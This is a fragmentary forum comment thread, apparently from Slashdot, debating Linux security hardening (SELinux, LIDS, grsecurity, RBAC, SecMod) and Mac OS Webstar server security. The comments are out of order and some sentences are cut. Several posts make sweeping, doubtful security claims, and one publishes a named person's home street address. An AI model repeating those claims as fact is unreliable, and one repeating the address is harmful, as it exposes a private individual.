5 : Macs running Webstar have ability to only run CGI placed in correct lodirectoy cation and correctly file typed.
Where is this enforced? If Webstar is enforcing this, once someone breaks into the system, it will make no difference. The intruder is already root.
6> Macs never run code ever merely based on how a file is named. ",exe" suffixes mean nothing.
It is a trivial matter to change a file type.
In what sense is garbage collection a security feature? That makes no sense.
It's not garbage collection as much as direct memory access and management. In C, it's very easy to accidentally write something that allows for the execution of arbitrary code. In Java, it's very hard.
This is similar to the way one should write banking code. For most of the programmers, there should be no way to add money to an account or remove money from an account. Instead, you just give them an API that allows transfers. That way you eliminate a whole class of possible errors.
The OP's confusion probably comes from the fact, that once you remove free(), garbage collection is the common solution.
Owl is something that I admire and would even run if it wasn't based around RPM. They've managed to create a system that could probably be run without any suid programs.
/etc/shadow into a tree, and each user has its own fragment that is only writable by that user. There's a bit of glibc/nsswitch magic to use that tree instead of the usual flat file, and the rest of the system just works as before.
Even chfn and passwd work, since they have split
There are other "duh, why didn't I think of that" changes, too. Think about it - why do syslogd and klogd keep root after starting? klogd needs to open a socket from the kernel. After that, does it need root? Nope. syslogd needs to be able to open logs and sometimes bind to a privileged port. Guess what, a user called 'syslogd' can open log files owned by syslogd, and it can drop root after it grabs that port. Owl also chroots klogd into a jail to keep it out of trouble once it starts.
I look forward to seeing this kind of cluefulness in other distributions, since it's obviously correct.
I wonder if this person works for StarNine?
Same post, different topic...
[RIAA] says its concern is artists. That's true, in just the sense that a cattle rancher is concerned about its cattle.
You may want to look at the fnk (or cipherfunk) kernel tree (no this is not carried on kernel.org). The link at freshmeat for cipherfunk kernels has connections for downloading and so on. His kernel tree contains the GRSecurity patches, a fair number of other patches (eg: FreeS/WAN), and any fixes he's made to get the lot running.
Basically this guys motivation is security and stability. He puts the whole lot through a barrage of tests, and makes sure things work, or at least determines if there is a problem and makes note of it.
1. Add a sys call to disable insmod to prevent crackers from inserting Trojans and Root Kit obscuring modules.
2. Disable processes from listening on high ports (above 1023, except possibly socks, NFS, or X if you're crazy to allow these on a server). It would be trivial to add this to the kernel.
3. Disable other than low numbered processes from listening on ports, if all of your servers start at boot time and don't need restarting.
4. Prevent creation of symlinks in dirs (such as /tmp) with the sticky bit on unless they point
to files owned by the creator. This reduces
popular symlink attacks. It might be possible to
block all symlinks here with most servers' mix
of processes.
5. Disable fchdir() and mknod() to prevent root's common way to break out of a chroot() jail. (Disabling /proc, /dev/mem and /dev/kmem, etc.
also will be needed but those aren't kernel mods.)
Keeping up-to-date w.r.t. security patches, running different servers on different systems to limit damage from an intrusion, using a good Adaptive Firewall and IDS, etc. will go a long way to conventional security as will using the LIDS, WireX's SubDomain, or NSA-enhanced kernels.
Those worrying about a NSA-planted bug in their kernel need only put a non-NSA Linux based Firewall in front to detect unexpected packets.
These and other ideas are from my book.
Bob Toxen, Author, Real World Linux Security, 2nd Ed.
Security Consulting,
Some kind fellow was running an SELinux box with a guest root account.
The account was powerless. SELinux is a paranoid sys admin's dream. You have to specifically grant ifconfig permission to see properties on each interface. Ping needs raw sockets access granted for each interface it wants to send pings over. etc.
It is stupid, but it means that even if someone does have an exploitable buffer overflow, their easily available rootkits are unlikely to do anything useful.
There was an example a couple of years ago where a Mac running Linux was left up in a default install with a "crack me" contest. (The prize being the Mac. After a couple of days they also handed out the root password.) After much effort and publicity (it got a lot because the contest mocked a parallel Microsoft stunt to test Windows 2000), the machine was eventually broken into, by someone using a well-known buffer overflow that had been public when it was first set up. Even though there were standard rootkits to exploit it, they were all x86 based, and wouldn't work until someone rewrote the necessary assembly code for the Mac.
In other words, using non-x86 hardware raises the bar. A lot.
Here is an Idea for easier security management through ACL's.
/bin and /usr file systems would automaticly be traversable, but directory listings,file reads, and file writes would be impossible for such a proccess.
Add a file system capability mask. This would be similar to the Group and Other file permissions, but would block those permissions.
For instance droping the "rw" capability from the "other" and "group" masks would cause this proccess, and all it's children to be denied access to files that it doesn't own (services should not be run as root of course), but still access files owned by it's user or files/directories explicitly given access vi ACL's. This way a user could grant access to everyone for his/her directory, but system process couldn't be coerced into reading that directory, or any directory. An admin would have to explicitly grant access for a system service. The whole
Is there any project doing this? Is this even a good idea?
LIDS is a great second defense. It comes into play when some cracker manages to get on your machine. If you set up the rules correctly, they won't be able to install their rootkits or will be easier to spot.
The only problems with LIDS is setting it up. Since every Linux distribution writes files to different areas. If you declair a directory as readonly or append only and a program wants to delete a file, you might have problems.
If you have a webserver or a machine in production that is contect to the internet, LIDS can be a good investment (time that is, it's free)
>What sort of problem were you having?
As I walked through the instructions, at some step or other it became apparent that the LIDS build process was wanting to modify the machine it was currently running on, or at least it sure looked that way. Since the build machine wasn't the target machine, I immediately stopped, and haven't ever had time to fiddle with it, again.
I'll also have to check out the sample SELinux security policies another responder mentioned. That is, once I get that increasingly rare commodity called "time" again. The dishwasher went on the fritz tonight and leaked, so after a little work tonight, tomorrow night will be repair, then some bin and paint in the basement ceiling after that. Then back to the scheduled home projects backing up.
The living have better things to do than to continue hating the dead.
RBAC is the most adequate solution to manage security of collaborative environment. Read more here:
"The principal motivation behind RBAC is the desire to specify and enforce enterprise-specific security policies in a way that maps naturally to an organization's structure.". Briefly, it's like a RDF graph: you have subjects and privelegies mapped to each other (M:M) using roles, which, in other relationships, hierarchically describe users.
They have some example for Linux. I've tried its concepts in few applications and found really it very naturally and intuitevely reflects security requirements in commercial systems. Oracle and NT security models have something similar, although NT domains are not nested while in Oracle the role graqph is not really hierarchical (acyclic though).
I've read about NSA SElinux and found they show a very good progress, but it's just a beginning. I believe that RBAC eventually will come to Linux (and to BSD after that?). Nothing is impossible in Linux (and in BSD, lol).
Less is more !
NOO! Microsoft definitely does not know what thier code does.
By taking the time to respond to it, what does that make you?
Helpful.
OpenBSD not only has more security, but you can leave it out for longer without having to remotely upgrade. Ever remotely patched/installed a kernel? It's quite, quite annoying. Why is it you can do this? Less holes AND more highly integrated code... plus, once you add in that the memory allocation routines in OpenBSD are quite extraordinary (try running X at a high resolution in linux, then run the exact same thing in openbsd... you'll see the difference in magnitudes ^_^), so its harder to overload your memory. Just a thought.
The dream reveals the reality which conception lags behind. That is the horror of life- the terror of art. -Franz Kafka
Try this. Go to http://www.hp.com/security/products/linux/eval/ and get it. Or wait for version 2.0 prob. this fall. Set up "compartments". Run applications in compartments, by default nothing is allowed except local console on reserved sys compartment. Communication between compartments is only allowed by explicit rule sets (IP, port, file access, etc). Network interfaces are compartmentalized. Compartments are chrooted, no raw sockets, no telnet, lots of other goodies. Includes default setup for Apache, Tomcat and other stuff.
Yes, but my linux box, can handle much more traffic than your Mac box. sorry buddy, in the real world, macs just don't cut it.
--p06
-- p06 "On religious wars: They're essentially wars over whoo's imaginary friend is better"
I hate these "Ask Slashdot:.." stories. This is not a technical support forum, and 'Ask Slashdot' is always about something technical. Get something more general where the mainstream can think deeply about....
I found the SNARE package (kern module, user space audit daemon and config GUI helpful)
http://intersectalliance.com/projects/Snare/
At least an authorizations/privilege security model instead of the anyone/root distinction is absolutely necessary.
The problem is, that many daemons (like Sendmail and such) override *all* security - of course, this is absolutely unnecessary.
For example, on Argus enhanced systems you run Sendmail with the pv_asn_port privilege instead of root privileges.
If someone manages to hack Sendmail, then the attacker can do nothing else than just open port 25, while on other OSs (even OpenBSD) the attacker gains root privileges.
Sendmail does not need root privileges to run, so why should we give Sendmail root privileges?
One key to more security is the 'principle of least privilege'. Modern Unix Operating Systems like Trusted Solaris show, that it is possible to implement fine-grained privilege control in Unix kernels.
Just securing a few dozens of applications (that's what the OpenBSD project calls OS security?) is not enough.
What if I need to run some other application?
An Operating System should be able to protect data even in the case, that an application gets hacked.
Our real problem is 'root' - it should never be used for any kind of server application (daemon), but only for system administration by an authorized user. There should not be any permanent processes running as root.
LIDS, the grsec patch, NSA's sample implementation of MAC and such things are steps into the right direction.
A totally paranoid OS is rejected by paranoid people. ITs also funny how people say how nuts you are to run NSA linux while recommending installing LIDS (built by China).
:)
People can be so entertaining at times
-- "of course thats just my opinion, I could be wrong." --Dennis Miller
Not EXTERNALLY. All the points about why no mac in HISTORY has been remotely exploited is because of those original points.... no way to get executable code into the machine.... at least historically.
If you want ,speed,and do not care about security run
Apache on a mac, because Apple demonstrated 20 months ago that the mac ran apache in a benchmark far faster than any other computer similar
in cost.
The Mac OS running Open Transport, based on open protocols, and bilevel protocol stack declaration order is amazing. It avoids lots of famous TCPIP hacks and it also allows end-to-end file transfer from ram to ram without copying a single data byte! (only pointers to buffers are passed end-to-end in the most ideal situations) There are also papers that discuss proper tuning of open-transactions vs queued transactions and how to get the most astounding hits per second from dynamic webstar content.
It does not raise the bar.. all intel stack exploits for LINUX can be trivially rewritten into PowerPC, and tutoraials have been written.
.exe extension can be executed!
1> There is no command line shell to allow redirection. No shell, no shell exploits or redirection of scripting.
2> Everyhing is 'root' at all times so programmers do not get lazy and fantacize about the existance of a more secure root to help protect them. The Webstar server, and other servers, as most mac programs, is written knowing that security is is important and that the code is running at root. Truthfully, PowerPC apps run at user-level, and Gary Davidian's birthdate needs to be passed in a register to gain true supervisor level, but no normal benefit is gained on a mac from running in the microkernel space or debugger-nub space.
3> Macintoshes do not suffer from stack exploits based on buffer overruns of C style strings. The mac uses Pascal style strings, instead of slow null-terminated strings in most all aspects of the entire operating system and in most users code. ANSI-C libraries are traditionally shunned. Pascal style strings are not only faster, they prevent the vast majority of buffer overrun problems.
4> Macintoshes do not EVER exucute code from file that are simple data files, no matter how the file is named or no matter how the file suffix is generated or set. Macintoshes use dual fork files, and text files and data files traditionally cannot easily become executables, and firthemore would typically need to have their 4-byte FILE-TYPE set to a value to even begin to allow a hackers file to be blessed for execution. Webstar and other tools do not typically allow any hacker or rougue tool to set file types by accident or on purpose. On a wintel system a text file saved with a
5> Source to mac os (pre os X) is not typically available outside apple corp. This is not a valid argument for security, (obscurity) but the appologists for the copious amount of linux redhat exploits use this as one reason for the many bugtraq exploits coverred.
6> The Mac OS weservers running Webstar do not automatically allow errantly saved files from executing out of the CGI bin merely because they are stored there.
7> The Mac OS has other good multi-homing multi-domain tools that run on it for robust free email (SIMS), DNS (QuickDNS Pro), FTP (Rumpus) and all have nice user interfaces to configure them and though these commercial tools may not be technically as secure as Webstar itself is, or the MacOS, I prefer them over running any open source tools on FreeBSD,NetBSD,OpenBSD,Linux, etc. Free is only free if you value your tech support at 0 dollars an hour sometimes. Plus, these other non Webstar related tools seem to have mostlty unblemished histories, unlike BIND.
8> People on the mac tend to use scripting languages based on Applescript rather than perl for os level dynamic work and protecting against some minor perl problems, or unix scripting (no command line on a mac, thankfully). I cannot attest to java as being swell, but the fact is many mac people tend to do dynamic content in straight C. Happlily Webstar includes a rich variety of trusted dynamic content assist tools.
9> Stack return address positioned in safer location than intel. Buffer exploits take advantage of loser programmers lack of string length checking and clobber the return address to run thier exploit code instead. The Mac places return address infornt of where the buffer would overrun. Much safer.
In fact in the entire securityfocus (bugtraq) database history there has never been a Mac exploited over the internet remotely.
A rare set of documentation tutorials and exercises on rewriting all buffer LINUX exploits from INTEL to PowerPC was published less than a year ago. The priceless hacker tutorials were by a linux fanatic : Christopher A Shepherd, 3036 Foxhill Circle #102, Apopka, FL 32703 and he wrote the tutorials in a context against BSD-Mach Mac OSX.
He was motivated by Phrack issue 49 (an intel article).
Believe it or not, I do lock the computer room door.
But the Ruskies still hack into my systems !
Looks like the do know some (undocumented ?!)BACKDOORS of Linux systems.
Where to find the info on those (undocumented ?!) backdoors in Linux ?
I am interested to know !
Muchas Gracias, Señor Edward Snowden !
Citing from their page: Key features:
Will NSA's Security Enhanced Linux stops the Ruskies from hacking into my systems?
I'm tired of searching high and low for security tips, applying patches and such, and still having the Ruskies prying open my systems with no problem.
Methinks there's a list of "undocumented Linux vulnerabilities" out there, and the Ruskies (amongst the others) are using it to hack Linux systems.
If there's such a list, I'd like to take a look at them. I'd like to close all those holes.
Anyone has the list ?
May I borrow it, please ?
Muchas Gracias, Señor Edward Snowden !
So unless you have a completely homogenous network there is currently no way to my knowledge that you can use ACLs across machines via NFS.
As already mentioned, ACLs give users working in groups more flexibility to share file access, rather than having the admin create a new group for each new permutation. They don't really enhance security.
Idempotent operation: Like MS software, wether you run it once or often, that doesn't make it any better.
Oy vay, mod down oredi ?
Oy vay, mod down oredi ?!
This is not specific to FreeBSD. Every BSD variant has this feature for ages AFAIK.
{{.sig}}
Medusa http://medusa.fornax.sk/English/project.shtml
is a set of patches that help you secure your Tux kernel. I donot have an indepth knowledge of the workings, but there was an article in LinukJournal http://www.linuxjournal.com/article.php?sid=3811
I think this might help
Incorrect -- There are fewer explots for MAC OS[anything] because frankly the security community couldn't care much less about how may ways you can exploit all of the three MACs connected to the internet :-)
For testing we have a Red Hat 6.0 based demo server running various services with known and unknown security holes: sshd 1.5, qpopper, wu-ftpd 2.6, Apache, BIND 8, and so on. These are original unpatched services, no firewalls, the only extra thing there is SecMod. The module has been configured to "sandbox" these services, and has done well enough to protect it for over two years from daily compromise attempts. We also offer free user accounts on the server for anyone who wishes to try local exploits too.
Creating the rule chains to configure the module is quite simple. The most common way is of course to define rules saying "this daemon program can't read any file except this and that, it can't execute anything but that, and can't do any syscalls except those, and can only write to this file. If it tries anything else, deny it and add an entry to syslog.". This has proven an effective protection against security vulnerabilities.
You can do many other things with these rules, for instance define ones saying "no-one is allowed to read these files (even root), except the file owner and users in group X", or "no-one can read this file with other program than 'pico'"... It's also possible to easily define chroot operations to be done in wanted circumstances, in other words "when user Z runs this program, create a chroot jail here".
For anyone interested there's more information available on www.secmod.com. The demo site address is demo1.secmod.com. --Jouko Pynnonen , Online Solutions Ltd, Finland
for those actually following this as a guideline (if anybody): I forgot to mention: make a /etc/vservers/01.conf and you need IP aliasing support in the kernel (and of course a kernel with the vservers/ctx patch).
--- Hindsight is 20/20, but walking backwards is not the answer.